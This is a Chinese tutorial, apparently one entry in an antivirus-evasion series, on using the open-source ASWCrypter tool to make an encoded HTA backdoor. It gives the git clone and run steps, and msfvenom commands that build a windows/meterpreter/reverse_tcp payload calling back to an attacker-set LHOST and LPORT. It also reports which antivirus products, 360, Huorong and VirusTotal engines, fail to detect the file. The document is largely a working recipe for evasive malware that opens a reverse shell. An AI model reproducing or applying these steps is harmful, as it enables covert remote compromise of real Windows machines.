免杀能力一览表
几点说明:
1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀或杀软查杀能力的判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。
一、ASWCrypter介绍
ASWCrypter是2018年开源的免杀工具,原理比较简单,使用msf生成hta代码,然后使用python脚本对hta代码进行一定编码处理,生成新的hta后门文件,从而达到免杀效果。
二、安装ASWCrypter
需要本机安装metasploit和python环境。
ASWCrypter的安装比较简单,先git clone到本地
git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git
进入ASWCrypter目录,执行chmod +x ./ASWCrypter.sh。
执行./ASWCrypter.sh即可运行ASWCrypter。
三、ASWCrypter使用说明
使用时需要注意的只有一点,就是要在linux桌面环境中运行,因为在ASWCrypter.sh脚本中,调用msfvenom生成后门时使用了xterm。
xterm -T "SHELLCODE GENERATOR(ASWCrypter)" -geometry 100x50 -e "msfvenom -p $paylo LHOST=$lhost LPORT=$lport -i 43 -f hta-psh > $getPATH/output/chars.raw"
四、利用ASWCrypter生成后门
执行./ASWCrypter.sh,选择G,第一步也只有这个能选
然后输入LHOST和LPORT
后门选择payload,我还是选择最常规的reverse_tcp了,文件名就随便输一个了
之后提示生成test4.hta成功,后面会提示是否开启msf监听,我这就不需要了,还是在mac上监听端口。
不开杀软的时候可正常上线
打开杀软,火绒静态和动态都能查杀,360动态+静态都没报警。
试了下msfvenom生成的原始的hta文件的查杀率
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f hta-psh -o test5.hta
virustotal.com上查杀率为28/56
五、ASWCrypter小结
ASWCrypter是使用msfvenom生成基于powershell的hta后门文件,然后进行编码处理,达到一定的免杀效果,不过因为会调用powershell,行为检测还是很容易被检测出来。
六、参考资料
官方Github:https://github.com/abedalqaderswedan1/aswcrypter
